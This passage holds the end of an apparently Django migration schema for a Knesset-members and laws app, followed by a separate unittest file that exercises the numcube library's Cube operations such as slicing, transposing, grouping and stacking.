'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'number_of_children': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'parties': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'all_members'", 'symmetrical': 'False', 'through': "orm['mks.Membership']", 'to': "orm['mks.Party']"}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'place_of_birth': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'place_of_residence': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'year_of_aliyah': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'mks.membership': {
'Meta': {'object_name': 'Membership'},
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Member']"}),
'party': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Party']"}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'mks.party': {
'Meta': {'object_name': 'Party'},
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_coalition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'number_of_members': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'number_of_seats': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'planet.blog': {
'Meta': {'object_name': 'Blog'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '200', 'db_index': 'True'})
},
'tagging.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'tagging.taggeditem': {
'Meta': {'unique_together': "(('tag', 'content_type', 'object_id'),)", 'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['tagging.Tag']"})
}
}
complete_apps = ['laws']
|
|
import unittest
import functools
import numpy as np
from numcube import Index, Axis, Cube, stack, concatenate
from numcube.exceptions import InvalidAxisLengthError, NonUniqueDimNamesError
from numcube.utils import is_axis, is_indexed
def year_quarter_cube():
"""Creates a sample 2D cube with axes "year" and "quarter" with shape (3, 4)."""
values = np.arange(12).reshape(3, 4)
ax1 = Index("year", [2014, 2015, 2016])
ax2 = Index("quarter", ["Q1", "Q2", "Q3", "Q4"])
return Cube(values, [ax1, ax2])
def year_quarter_weekday_cube():
"""Creates 3D cube with axes "year", "quarter", "weekday" with shape (3, 4, 7)."""
values = np.arange(3 * 4 * 7).reshape(3, 4, 7)
ax1 = Index("year", [2014, 2015, 2016])
ax2 = Index("quarter", ["Q1", "Q2", "Q3", "Q4"])
ax3 = Index("weekday", ["mon", "tue", "wed", "thu", "fri", "sat", "sun"])
return Cube(values, [ax1, ax2, ax3])
class CubeTests(unittest.TestCase):
def test_empty_cube(self):
c = Cube([], Axis("x", []))
self.assertEqual(c.ndim, 1)
self.assertEqual(c.dims, ("x",))
self.assertEqual(c.size, 0)
c = Cube(np.empty((0, 0)), [Axis("x", []), Axis("y", [])])
self.assertEqual(c.ndim, 2)
self.assertEqual(c.dims, ("x", "y"))
self.assertEqual(c.size, 0)
def test_create_scalar(self):
c = Cube(1, None)
self.assertEqual(c.ndim, 0)
self.assertEqual(c.size, 1)
c = Cube(None, None)
self.assertEqual(c.ndim, 0)
self.assertEqual(c.size, 1)
c = Cube(1, [])
self.assertEqual(c.ndim, 0)
self.assertEqual(c.size, 1)
def test_create_cube(self):
ax1 = Index("A", [10, 20, 30])
ax2 = Index("B", ["a", "b", "c", "d"])
ax3 = Index("C", [1.1, 1.2])
# test Cube.zeros()
a = Cube.zeros([ax1, ax3])
self.assertTrue(np.array_equal(a.values, [[0, 0], [0, 0], [0, 0]]))
# test Cube.ones()
a = Cube.ones([ax1, ax3])
self.assertTrue(np.array_equal(a.values, [[1, 1], [1, 1], [1, 1]]))
# test Cube.full()
a = Cube.full([ax1, ax3], np.inf)
self.assertTrue(np.array_equal(a.values, [[np.inf, np.inf], [np.inf, np.inf], [np.inf, np.inf]]))
# test Cube.full with NaNs
# note: be careful because NaN != NaN so np.array_equal does not work
a = Cube.full([ax1, ax3], np.nan)
np.testing.assert_equal(a.values, [[np.nan, np.nan], [np.nan, np.nan], [np.nan, np.nan]])
# create one-dimensional cube
values = np.arange(3)
try:
Cube(values, (ax1,))
Cube(values, ax1) # no need to pass axes as collection if there is only one axis
except Exception:
self.fail("raised exception unexpectedly")
# two-dimensional cubes
values = np.arange(12).reshape(3, 4)
try:
Cube(values, (ax1, ax2))
Cube(values, [ax1, ax2])
except Exception:
self.fail("raised exception unexpectedly")
# wrong number of dimensions
self.assertRaises(ValueError, Cube, values, [ax1, ax2, ax3])
# wrong lengths of dimensions
self.assertRaises(ValueError, Cube, values, [ax1, ax3])
self.assertRaises(ValueError, Cube, values, [ax2, ax1])
def test_axes(self):
"""Counting axes, accessing axes by name or index, etc."""
c = year_quarter_cube()
# number of dimensions (axes)
self.assertEqual(c.ndim, 2)
self.assertEqual(c.dims, ("year", "quarter"))
# get axis by index, by name and by axis object
axis1 = c.axis(0)
axis2 = c.axis("year")
self.assertEqual(axis1, axis2)
axis3 = c.axis(-2) # counting backwards
self.assertEqual(axis1, axis3)
axis4 = c.axis(axis1)
self.assertEqual(axis1, axis4)
# invalid axis identification raises LookupError
self.assertRaises(LookupError, c.axis, "bad_axis")
self.assertRaises(LookupError, c.axis, 3)
self.assertRaises(LookupError, c.axis, Axis("bad_axis", []))
# invalid argument types
self.assertRaises(TypeError, c.axis, 1.0)
self.assertRaises(TypeError, c.axis, None)
def test_axis_index(self):
c = year_quarter_cube()
# get axis index by name
self.assertEqual(c.axis_index("year"), 0)
self.assertEqual(c.axis_index("quarter"), 1)
# get axis index by Axis object
self.assertEqual(c.axis_index(c.axis(0)), 0)
self.assertEqual(c.axis_index(c.axis(1)), 1)
# get axis index by index (negative turns to positive)
self.assertEqual(c.axis_index(0), 0)
self.assertEqual(c.axis_index(-2), 0)
# invalid axes
self.assertRaises(LookupError, c.axis_index, "bad_axis")
self.assertRaises(LookupError, c.axis_index, Axis("bad_axis", []))
self.assertRaises(LookupError, c.axis_index, 2)
# invalid argument types
self.assertRaises(TypeError, c.axis_index, 1.0)
self.assertRaises(TypeError, c.axis_index, None)
def test_has_axis(self):
c = year_quarter_cube()
# whether axis exists - by name
self.assertTrue(c.has_axis("year"))
self.assertFalse(c.has_axis("bad_axis"))
# whether axis exists - by index (negative index means counting backwards)
self.assertTrue(c.has_axis(1))
self.assertFalse(c.has_axis(2))
self.assertTrue(c.has_axis(-1))
self.assertFalse(c.has_axis(-3))
# whether axis exists - by Axis object
ax1 = c.axis(0)
self.assertTrue(c.has_axis(ax1))
ax2 = Axis("year", []) # same name but different identity
self.assertFalse(c.has_axis(ax2))
# invalid argument types
self.assertRaises(TypeError, c.has_axis, 1.0)
self.assertRaises(TypeError, c.has_axis, None)
def test_getitem(self):
"""Getting items by row and column, slicing etc. using __getitem__(item)"""
c = year_quarter_cube()
d = c[0:2, 0:3]
self.assertTrue(np.array_equal(d.values, [[0, 1, 2], [4, 5, 6]]))
self.assertEqual(d.ndim, 2)
self.assertEqual(tuple(d.dims), ("year", "quarter"))
# indexing - will collapse (i.e. remove) axis
d = c[0]
self.assertEqual(d.ndim, 1)
self.assertEqual(d.axis(0).name, "quarter")
self.assertTrue(np.array_equal(d.values, [0, 1, 2, 3]))
d = c[:, 0]
self.assertEqual(d.ndim, 1)
self.assertEqual(d.axis(0).name, "year")
self.assertTrue(np.array_equal(d.values, [0, 4, 8]))
# slicing - will not collapse axis
d = c[0:1]
self.assertEqual(d.ndim, 2)
self.assertTrue(np.array_equal(d.values, [[0, 1, 2, 3]]))
d = c[slice(0, 1)]
self.assertEqual(d.ndim, 2)
self.assertTrue(np.array_equal(d.values, [[0, 1, 2, 3]]))
d = c[:, 0:1]
self.assertEqual(d.ndim, 2)
self.assertTrue(np.array_equal(d.values, [[0], [4], [8]]))
d = c[(slice(0, None), slice(0, 1))]
self.assertEqual(d.ndim, 2)
self.assertTrue(np.array_equal(d.values, [[0], [4], [8]]))
# using negative indices
self.assertTrue(np.array_equal(c[-1].values, [8, 9, 10, 11]))
self.assertTrue(np.array_equal(c[:, -1].values, [3, 7, 11]))
# wrong index
self.assertRaises(IndexError, c.__getitem__, 5)
# eq. C[0, 0, 0] raises IndexError: too many indices
self.assertRaises(IndexError, c.__getitem__, (0, 0, 0))
# wring number of slices
self.assertRaises(IndexError, c.__getitem__, (slice(0, 2), slice(0, 2), slice(0, 2)))
# np.newaxis is not supported
self.assertRaises(ValueError, c.__getitem__, (0, 0, np.newaxis))
self.assertRaises(ValueError, c.__getitem__, (np.newaxis, 0, 0))
def test_filter(self):
"""Testing function Cube.filter()"""
c = year_quarter_cube()
d = c.filter("year", [2014, 2018]) # 2018 is ignored
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[0]).all())
year_filter = Axis("year", range(2010, 2015))
d = c.filter(year_filter)
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[0]).all())
year_filter = Index("year", range(2010, 2015))
d = c.filter(year_filter)
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[0]).all())
country_filter = Axis("country", ["DE", "FR"]) # this axis is ignored
# filter by two axis filters
quarter_filter = Index("quarter", ["Q1", "Q3"])
d = c.filter([quarter_filter, country_filter, year_filter])
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[[0, 0], [0, 2]]).all())
# cube as a filter
yq_cube_filter = Cube.ones([quarter_filter, year_filter, country_filter])
d = c.filter(yq_cube_filter)
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[[0, 0], [0, 2]]).all())
# a collection of cubes as a filter
y_cube_filter = Cube.ones([year_filter, country_filter])
q_cube_filter = Cube.ones([country_filter, quarter_filter])
d = c.filter([y_cube_filter, q_cube_filter])
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[[0, 0], [0, 2]]).all())
def test_exclude(self):
"""Testing function Cube.exclude()"""
# TODO complete tests
c = year_quarter_cube()
d = c.exclude("year", [2015, 2016, 2018]) # 2018 is ignored
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[0]).all())
# for large collections it is better for performance to pass the parameter as a set
d = c.exclude("year", set(range(2015, 3000)))
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[0]).all())
def test_apply(self):
"""Applies a function on each cube element."""
c = year_quarter_weekday_cube()
# apply vectorized function
d = c.apply(np.sin)
self.assertTrue(np.array_equal(np.sin(c.values), d.values))
# apply non-vectorized function
import math
e = c.apply(math.sin)
self.assertTrue((e == d).all())
# apply lambda
f = c.apply(lambda v: 1 if 6 <= v <= 8 else 0)
self.assertTrue(f.sum(), 3)
def test_masked(self):
"""Masking cube values."""
# TODO
pass
def test_squeeze(self):
"""Removes axes which have only one element."""
ax1 = Index("A", [1]) # has only one element, thus can be collapsed
ax2 = Index("B", [1, 2, 3])
c = Cube([[1, 2, 3]], [ax1, ax2])
self.assertEqual(c.ndim, 2)
d = c.squeeze()
self.assertEqual(d.ndim, 1)
self.assertEqual(d.axis(0).name, "B")
c = Cube([[1], [2], [3]], [ax2, ax1])
self.assertEqual(c.ndim, 2)
d = c.squeeze()
self.assertEqual(d.ndim, 1)
self.assertEqual(d.axis(0).name, "B")
ax3 = Index("C", [1]) # has only one element, thus can be collapsed
c = Cube([[1]], [ax1, ax3])
self.assertEqual(c.ndim, 2)
d = c.squeeze() # will collapse both axes
self.assertEqual(d.ndim, 0)
def test_transpose(self):
c = year_quarter_weekday_cube()
# transpose by axis indices
d = c.transpose([1, 0, 2])
self.assertEqual(d.shape, (4, 3, 7))
self.assertEqual(d.dims, ("quarter", "year", "weekday"))
# check that original cube has not been changed
self.assertEqual(c.shape, (3, 4, 7))
self.assertEqual(c.dims, ("year", "quarter", "weekday"))
# compare with numpy transpose
self.assertTrue(np.array_equal(d.values, c.values.transpose([1, 0, 2])))
# transpose by axis names
e = c.transpose(["quarter", "year", "weekday"])
self.assertEqual(e.dims, ("quarter", "year", "weekday"))
self.assertTrue(np.array_equal(d.values, e.values))
# transpose axes specified by negative indices
e = c.transpose([-2, -3, -1])
self.assertTrue(np.array_equal(d.values, e.values))
# specify 'front' argument (does not need to be specified explicitly)
e = c.transpose(["quarter", "year"])
self.assertTrue(np.array_equal(d.values, e.values))
e = c.transpose([1, 0])
self.assertTrue(np.array_equal(d.values, e.values))
# specify 'back' argument
e = c.transpose(back=["year", "weekday"])
self.assertTrue(np.array_equal(d.values, e.values))
e = c.transpose(back=[0, 2])
self.assertTrue(np.array_equal(d.values, e.values))
# specify 'front' and 'back' argument
e = c.transpose(front="quarter", back="weekday")
self.assertTrue(np.array_equal(d.values, e.values))
# transpose with wrong axis indices
self.assertRaises(LookupError, c.transpose, [3, 0, 2])
self.assertRaises(LookupError, c.transpose, [-5, 0, 1])
# transpose with wrong axis names
self.assertRaises(LookupError, c.transpose, ["A", "B", "C"])
# invalid axis identification raises LookupError
self.assertRaises(LookupError, c.transpose, ["year", "weekday", "quarter", "A"])
self.assertRaises(LookupError, c.transpose, [1, 0, 2, 3])
# duplicate axes raise ValueError
self.assertRaises(ValueError, c.transpose, [0, 0, 2])
self.assertRaises(ValueError, c.transpose, ["year", "year", "quarter"])
self.assertRaises(ValueError, c.transpose, front=["year", "weekday"], back=["year", "quarter"])
self.assertRaises(ValueError, c.transpose, front=[1, 2], back=[0, 1])
# invalid types
self.assertRaises(TypeError, c.transpose, [1.1, 0, 2])
self.assertRaises(TypeError, c.transpose, [None, "weekday", "year"])
def test_operations(self):
values = np.arange(12).reshape(3, 4)
axc1 = Index("a", [10, 20, 30])
axc2 = Index("b", ["a", "b", "c", "d"])
c = Cube(values, [axc1, axc2])
axd1 = Index("a", [10, 20, 30])
axd2 = Index("b", ["a", "b", "c", "d"])
d = Cube(values, [axd1, axd2])
x = c * d
self.assertTrue(np.array_equal(x.values, values * values))
e = Cube([0, 1, 2], [Index("a", [10, 20, 30])])
x2 = c * e
self.assertTrue(np.array_equal(x2.values, values * np.array([[0], [1], [2]])))
c3 = Cube([0, 1, 2, 3], [Index("b", ["a", "b", "c", "d"])])
x3 = c * c3
self.assertTrue(np.array_equal(x3.values, values * np.array([0, 1, 2, 3])))
c3 = Cube([0, 1, 2, 3], [Index("b", ["b", "a", "c", "d"])])
x3 = c * c3
self.assertTrue(np.array_equal(x3.values, values * np.array([1, 0, 2, 3])))
values_d = np.array([0, 1])
d = Cube(values_d, [Index("d", ["d1", "d2"])])
x = c * d
self.assertEqual(x.ndim, 3)
self.assertEqual(x.axis(0).name, "a")
self.assertEqual(x.axis(1).name, "b")
self.assertEqual(x.axis(2).name, "d")
self.assertTrue(np.array_equal(x.values, values.reshape(3, 4, 1) * values_d))
# operations with scalar
d = 10
x = c * d
self.assertTrue(np.array_equal(x.values, values * d))
x = d * c
self.assertTrue(np.array_equal(x.values, values * d))
# operations with numpy.ndarray
d = np.arange(4)
x = c * d
self.assertTrue(np.array_equal(x.values, values * d))
x = d * c
self.assertTrue(np.array_equal(x.values, values * d))
d = np.arange(3).reshape(3, 1)
x = c * d
self.assertTrue(np.array_equal(x.values, values * d))
x = d * c
self.assertTrue(np.array_equal(x.values, values * d))
# matching Index and Series
values_d = np.array([0, 1])
d = Cube(values_d, Axis("a", [10, 10]))
x = c * d
self.assertTrue(np.array_equal(x.values, values.take([0, 0], 0) * values_d[:, np.newaxis]))
values_d = np.array([0, 1, 2, 3])
d = Cube(values_d, Axis("b", ["d", "d", "c", "a"]))
x = c * d
self.assertTrue(np.array_equal(x.values, values.take([3, 3, 2, 0], 1) * values_d))
# unary plus and minus
c = year_quarter_cube()
self.assertTrue(np.array_equal((+c).values, c.values))
self.assertTrue(np.array_equal((-c).values, -c.values))
c = year_quarter_cube() + 1 # +1 to prevent division by zero error
import operator as op
ops = [op.add, op.mul, op.floordiv, op.truediv, op.sub, op.pow, op.mod, # arithmetics ops
op.eq, op.ne, op.ge, op.le, op.gt, op.lt, # comparison ops
op.and_, op.or_, op.xor, op.rshift, op.lshift] # bitwise ops
# operations with scalar
d = 2
for op in ops:
self.assertTrue(np.array_equal(op(c, d).values, op(c.values, d)))
self.assertTrue(np.array_equal(op(d, c).values, op(d, c.values)))
# oprations with numpy array
d = (np.arange(12).reshape(3, 4) / 6 + 1).astype(np.int) # +1 to prevent division by zero error
for op in ops:
self.assertTrue(np.array_equal(op(c, d).values, op(c.values, d)))
self.assertTrue(np.array_equal(op(d, c).values, op(d, c.values)))
def test_group_by(self):
values = np.arange(12).reshape(3, 4)
ax1 = Axis("year", [2014, 2014, 2014])
ax2 = Axis("month", ["jan", "jan", "feb", "feb"])
c = Cube(values, [ax1, ax2])
d = c.reduce(np.mean, group=0) # average by year
self.assertTrue(np.array_equal(d.values, np.array([[4, 5, 6, 7]])))
self.assertTrue(is_indexed(d.axis(0)))
self.assertEqual(len(d.axis(0)), 1)
self.assertEqual(d.values.shape, (1, 4)) # axes with length of 1 are not collapsed
d = c.reduce(np.sum, group=ax2.name, sort_grp=False) # sum by month
self.assertTrue(np.array_equal(d.values, np.array([[1, 5], [9, 13], [17, 21]])))
self.assertTrue(np.array_equal(d.axis(ax2.name).values, ["jan", "feb"]))
d = c.reduce(np.sum, group=ax2.name) # sum by month, sorted by default
self.assertTrue(np.array_equal(d.values, np.array([[5, 1], [13, 9], [21, 17]])))
self.assertTrue(np.array_equal(d.axis(ax2.name).values, ["feb", "jan"]))
self.assertTrue(is_indexed(d.axis(ax2.name)))
self.assertEqual(len(d.axis(ax2.name)), 2)
self.assertEqual(d.values.shape, (3, 2))
# testing various aggregation functions using direct calling, e.g. c.sum(group=0),
# or indirect calling, e.g. reduce(func=np.sum, group=0)
funcs_indirect = [np.sum, np.mean, np.median, np.min, np.max, np.prod]
funcs_direct = [c.sum, c.mean, c.median, c.min, c.max, c.prod]
for func_indirect, func_direct in zip(funcs_indirect, funcs_direct):
result = np.apply_along_axis(func_indirect, 0, c.values)
d = c.reduce(func_indirect, group=ax1.name)
self.assertTrue(np.array_equiv(d.values, result))
e = func_direct(group=ax1.name)
self.assertTrue(np.array_equiv(e.values, result))
# testing function with extra parameters which cannot be passed as *args
third_quartile = functools.partial(np.percentile, q=75)
d = c.reduce(third_quartile, group=ax1.name)
self.assertTrue(np.array_equiv(d.values, np.apply_along_axis(third_quartile, 0, c.values)))
# the same but using lambda - this is actually simpler and more powerful way
third_quartile_lambda = lambda sample: np.percentile(sample, q=75)
d = c.reduce(third_quartile_lambda, group=ax1.name)
self.assertTrue(np.array_equiv(d.values, np.apply_along_axis(third_quartile_lambda, 0, c.values)))
def test_rename_axis(self):
c = year_quarter_cube()
# axes by name
d = c.rename_axis("year", "Y")
d = d.rename_axis("quarter", "Q")
self.assertEqual(tuple(d.dims), ("Y", "Q"))
# axes by index
d = c.rename_axis(0, "Y")
d = d.rename_axis(1, "Q")
self.assertEqual(tuple(d.dims), ("Y", "Q"))
# axes with negative indices
d = c.rename_axis(-2, "Y")
d = d.rename_axis(-1, "Q")
self.assertEqual(tuple(d.dims), ("Y", "Q"))
# invalid new axis name type
self.assertRaises(TypeError, c.rename_axis, 0, 0.0)
self.assertRaises(TypeError, c.rename_axis, "year", None)
# duplicate axes
self.assertRaises(ValueError, c.rename_axis, 0, "quarter")
self.assertRaises(ValueError, c.rename_axis, "year", "quarter")
# non-existing axes
self.assertRaises(LookupError, c.rename_axis, 2, "quarter")
self.assertRaises(LookupError, c.rename_axis, "bad_axis", "quarter")
def test_slice(self):
c = year_quarter_weekday_cube()
ax = 0
d = c.slice(ax, None, None, 2) # every even item
self.assertTrue(np.array_equal(d.values, c.values[:, :, ::2]))
self.assertTrue(np.array_equal(d.axis(ax).values, c.axis(ax).values[::2]))
def test_first(self):
c = year_quarter_weekday_cube()
ax = "year"
d = c.first(ax, 2)
self.assertTrue(np.array_equal(d.values, c.values[0: 2]))
self.assertTrue(np.array_equal(d.axis(ax).values, c.axis(ax).values[0: 2]))
def test_last(self):
c = year_quarter_weekday_cube()
ax = "quarter"
d = c.last(ax, 2)
self.assertTrue(np.array_equal(d.values, c.values[:, -2:]))
self.assertTrue(np.array_equal(d.axis(ax).values, c.axis(ax).values[-2:]))
def test_reversed(self):
c = year_quarter_weekday_cube()
ax = "weekday"
d = c.reversed(ax)
self.assertTrue(np.array_equal(d.values, c.values[:, :, ::-1]))
self.assertTrue(np.array_equal(d.axis(ax).values, c.axis(ax).values[::-1]))
def test_diff(self):
c = year_quarter_weekday_cube()
d = c.diff("year")
self.assertTrue(np.array_equal(d.values, np.diff(c.values, n=1, axis=0)))
self.assertTrue(np.array_equal(d.axis("year").values, [2015, 2016]))
d = c.diff("quarter", n=2)
self.assertTrue(np.array_equal(d.values, np.diff(c.values, n=2, axis=1)))
self.assertTrue(np.array_equal(d.axis("quarter").values, ["Q3", "Q4"]))
d = c.diff("weekday", n=4, axis_shift=0)
self.assertTrue(np.array_equal(d.values, np.diff(c.values, n=4, axis=2)))
self.assertTrue(np.array_equal(d.axis("weekday").values, ["mon", "tue", "wed"]))
def test_growth(self):
c = year_quarter_cube() + 1 # to prevent division by zero
d = c.growth("year")
self.assertTrue(np.array_equal(d.values, c.values[1:, :] / c.values[:-1, :]))
self.assertTrue(np.array_equal(d.axis("year").values, c.axis("year").values[1:]))
d = c.growth(1) # 1 = quarter axis
self.assertTrue(np.array_equal(d.values, c.values[:, 1:] / c.values[:, :-1]))
d = c.growth("year", axis_shift=0)
self.assertTrue(np.array_equal(d.values, c.values[1:, :] / c.values[:-1, :]))
self.assertTrue(np.array_equal(d.axis("year").values, c.axis("year").values[:-1]))
def test_aggregate(self):
c = year_quarter_cube()
self.assertTrue((c.sum("quarter") == c.sum(1)).all())
self.assertTrue((c.sum("quarter") == c.sum(-1)).all())
self.assertTrue((c.sum("year") == c.sum(keep=1)).all())
self.assertTrue((c.sum("year") == c.sum(keep=-1)).all())
self.assertTrue((c.sum(["year"]) == c.sum(keep=[-1])).all())
self.assertTrue((c.sum("quarter") == c.sum(keep="year")).all())
year_ax = c.axis("year")
quarter_ax = c.axis("quarter")
self.assertTrue((c.sum(year_ax) == c.sum("year")).all())
self.assertTrue((c.sum(year_ax) == c.sum(keep=quarter_ax)).all())
self.assertTrue((c.sum(quarter_ax) == c.sum(1)).all())
self.assertTrue((c.sum(quarter_ax) == c.sum(keep=0)).all())
self.assertEqual(c.sum(None), c.sum())
self.assertEqual(c.sum(), np.sum(c.values))
self.assertEqual(c.mean(), np.mean(c.values))
self.assertEqual(c.min(), np.min(c.values))
self.assertEqual(c.max(), np.max(c.values))
self.assertRaises(LookupError, c.sum, "bad_axis")
self.assertRaises(LookupError, c.sum, 2)
self.assertRaises(TypeError, c.sum, 1.0)
def test_swap_axes(self):
c = year_quarter_weekday_cube()
self.assertEqual(c.shape, (3, 4, 7))
# swap by name
d = c.swap_axes("year", "quarter")
self.assertEqual(tuple(d.dims), ("quarter", "year", "weekday"))
self.assertEqual(d.shape, (4, 3, 7))
# swap by index
d = c.swap_axes(0, 2)
self.assertEqual(tuple(d.dims), ("weekday", "quarter", "year"))
self.assertEqual(d.shape, (7, 4, 3))
# swap by index and name
d = c.swap_axes(0, "quarter")
self.assertEqual(tuple(d.dims), ("quarter", "year", "weekday"))
self.assertEqual(d.shape, (4, 3, 7))
# swap Axis instances
year_axis = c.axis("year")
quarter_axis = c.axis("quarter")
d = c.swap_axes(year_axis, quarter_axis)
self.assertEqual(tuple(d.dims), ("quarter", "year", "weekday"))
self.assertEqual(d.shape, (4, 3, 7))
# wrong axis results in LookupError
self.assertRaises(LookupError, c.sum, "bad_axis")
self.assertRaises(LookupError, c.sum, 3)
def test_align_axis(self):
c = year_quarter_cube()
ax1 = Axis("year", [2015, 2015, 2014, 2014])
ax2 = Index("quarter", ["Q1", "Q3"])
d = c.align(ax1)
d = d.align(ax2)
# test identity of the new axis
self.assertTrue(d.axis("year") is ax1)
self.assertTrue(d.axis("quarter") is ax2)
# test aligned values
self.assertTrue(np.array_equal(d.values, [[4, 6], [4, 6], [0, 2], [0, 2]]))
def test_concatenate(self):
values = np.arange(12).reshape(3, 4)
ax1 = Index("year", [2014, 2015, 2016])
ax2 = Index("month", ["jan", "feb", "mar", "apr"])
c = Cube(values, [ax1, ax2])
values = np.arange(12).reshape(4, 3)
ax3 = Index("year", [2014, 2015, 2016])
ax4 = Index("month", ["may", "jun", "jul", "aug"])
d = Cube(values, [ax4, ax3])
e = concatenate([c, d], "month")
self.assertEqual(e.ndim, 2)
self.assertEqual(e.shape, (8, 3)) # the joined axis is always the first
self.assertTrue(is_axis(e.axis("month")))
e = concatenate([c, d], "month", as_index=True)
self.assertEqual(e.ndim, 2)
self.assertEqual(e.shape, (8, 3))
self.assertTrue(is_indexed(e.axis("month")))
# duplicate index values
self.assertRaises(ValueError, concatenate, [c, c], "month", as_index=True)
# broadcasting of an axis
countries = Axis("country", ["DE", "FR"])
f = d.insert_axis(countries)
g = concatenate([c, f], "month", broadcast=True)
self.assertEqual(g.ndim, 3)
self.assertEqual(g.shape, (8, 3, 2))
# if automatic broadcasting is not allowed
self.assertRaises(LookupError, concatenate, [c, f], "month", broadcast=False)
def test_stack(self):
c = year_quarter_cube()
d = year_quarter_cube()
country_axis = Index("country", ["GB", "FR"])
e = stack([c, d], country_axis)
self.assertEqual(e.values.shape, (2, 3, 4))
# the merged axis go first
self.assertEqual(tuple(e.dims), ("country", "year", "quarter"))
# axis with the same name already exists
c = year_quarter_cube()
d = year_quarter_cube()
year_axis = Index("year", [2000, 2001])
self.assertRaises(ValueError, stack, [c, d], year_axis)
# different number of cubes and axis length
c = year_quarter_cube()
d = year_quarter_cube()
country_axis = Index("country", ["GB", "FR", "DE"])
self.assertRaises(ValueError, stack, [c, d], country_axis)
# cubes do not have uniform shapes
c = year_quarter_cube()
d = year_quarter_weekday_cube()
country_axis = Index("country", ["GB", "FR"])
self.assertRaises(LookupError, stack, [c, d], country_axis)
# the previous example if O, if automatic broadcasting is allowed
e = stack([c, d], country_axis, broadcast=True)
self.assertEqual(e.ndim, 4)
# broadcast axes go last
self.assertEqual(tuple(e.dims), ("country", "year", "quarter", "weekday"))
def test_combine_axes(self):
c = year_quarter_weekday_cube()
# duplicate axes
self.assertRaises(ValueError, c.combine_axes, ["year", "year"], "period", "{}-{}")
self.assertRaises(ValueError, c.combine_axes, ["year", "quarter"], "weekday", "{}-{}")
d = c.combine_axes(["year", "quarter"], "period", "{}-{}")
self.assertEqual(tuple(d.dims), ("period", "weekday"))
def test_take(self):
c = year_quarter_cube()
# axis by name
self.assertTrue(np.array_equal(c.take("year", [0, 1]).values, c.values.take([0, 1], 0)))
self.assertTrue(np.array_equal(c.take("quarter", [0, 1]).values, c.values.take([0, 1], 1)))
# axis by index
self.assertTrue(np.array_equal(c.take(0, [0, 1]).values, c.values.take([0, 1], 0)))
self.assertTrue(np.array_equal(c.take(1, [0, 1]).values, c.values.take([0, 1], 1)))
# do not collapse dimension - a single int in a list or tuple
d = c.take(0, [2])
self.assertEqual(d.ndim, 2)
self.assertTrue(np.array_equal(d.values, c.values.take([2], 0)))
d = c.take(0, (2,))
self.assertEqual(d.ndim, 2)
self.assertTrue(np.array_equal(d.values, c.values.take([2], 0)))
# collapse dimension - a single int
d = c.take(0, 2)
self.assertEqual(d.ndim, 1)
self.assertTrue(np.array_equal(d.values, c.values.take(2, 0)))
# negative index
self.assertTrue(np.array_equal(c.take("year", [-3, -2]).values, c.values.take([0, 1], 0)))
# wrong axes
self.assertRaises(LookupError, c.take, "bad_axis", [0, 1])
self.assertRaises(LookupError, c.take, 2, [0, 1])
# wrong indices
self.assertRaises(IndexError, c.take, "year", 4)
self.assertRaises(IndexError, c.take, "year", [0, 4])
self.assertRaises(ValueError, c.take, "year", ["X"])
self.assertRaises(TypeError, c.take, "year", None)
def test_slice(self):
c = year_quarter_cube()
d = c.slice("year", -1) # except the last one
self.assertTrue(np.array_equal(d.values, c.values[:-1, :]))
d = c.slice(1, 0, 3, 2) # 1 = quarter axis
self.assertTrue(np.array_equal(d.values, c.values[:, 0: 3: 2]))
# accepting a slice as an argument
slc = slice(0, 3, 2)
d = c.slice(1, slc) # 1 = quarter axis
